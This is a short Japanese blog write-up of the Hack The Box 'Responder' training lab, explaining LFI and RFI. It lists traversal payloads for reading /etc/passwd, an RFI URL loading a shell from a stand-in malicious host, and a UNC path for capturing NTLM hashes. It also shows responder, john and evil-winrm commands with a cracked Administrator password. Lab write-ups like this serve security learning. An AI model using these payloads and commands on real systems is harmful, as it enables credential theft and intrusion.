![見出し画像](https://assets.st-note.com/production/uploads/images/159720005/rectangle_large_type_2_109a4cdd8b74297b5838a232c561e17d.png?width=1200)
HTB Responder
学んだこと
LFIとRFI
LFI(Local File Inclusion)はウェブアプリケーション内でローカルのファイルをインクルード(読み込み)する際に発生する脆弱性です。アプリケーションがユーザーからの入力を不適切に扱うことで、意図しないローカルファイルを読み込むことを許可してしまいます。
ファイルをインクルードするPHPのinclude関数が使われている場合に発生しやすいです。
URLがhttps://example.com/index.php?page=aboutのような場合、攻撃者がpageパラメータに任意のファイルパス(例:../../etc/passwd)を入力して、サーバー上の重要なファイルを読み取ることが可能です。
https://example.com/index.php?page=../../../../etc/passwd
https://example.com/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
RFI(Remote File Inclusion)は外部のサーバーにあるリモートファイルをインクルードしてしまう脆弱性です。LFIと同様に、ユーザー入力をファイルインクルードに直接利用している場合に発生し、攻撃者が外部サーバーから悪意のあるスクリプトを読み込ませて実行させることが可能です。
URLがhttps://example.com/index.php?page=aboutの場合、攻撃者がpageパラメータにリモートファイルのURL(例:http://malicious.com/shell.php)を指定することで、悪意のあるコードを読み込んで実行させることができます。
https://example.com/index.php?page=http://malicious.com/shell.php
ファイル共有でリモートファイルをアクセスするようにして認証情報を傍受する
https://example.com/index.php?page=//10.10.10.10/somefile
responder
ローカルネットワークでの認証情報やパスワードハッシュの取得を目的とするセキュリティツールです。主にセキュリティテストやリスク評価で使われ、不正アクセスや情報漏洩のリスクを評価するために利用されます。Responderは、LLMNR(Link-Local Multicast Name Resolution)やNBT-NS(NetBIOS Name Service)、MDNS(Multicast DNS)といった、ローカルネットワーク上での名前解決プロトコルの脆弱性を悪用して認証情報を収集します。
今回はNTLMの認証情報をキャプチャーしました。
$ sudo responder -I tun0
Jon the ripper
$ john HASH.txt -w=/usr/share/wordlist/rockyou.txt
WinRM
$ evil-winrm -i unika.htb -u RESPONDER\Administrator -p badminton
感想
Startpointと油断しておりましたが、今まで聞いたことがなかった用語をたくさん学べてツールも使えて勉強になりました。
調べる中で久々にOSI参照モデルも見てネットワークのことも少し学ぶことができました。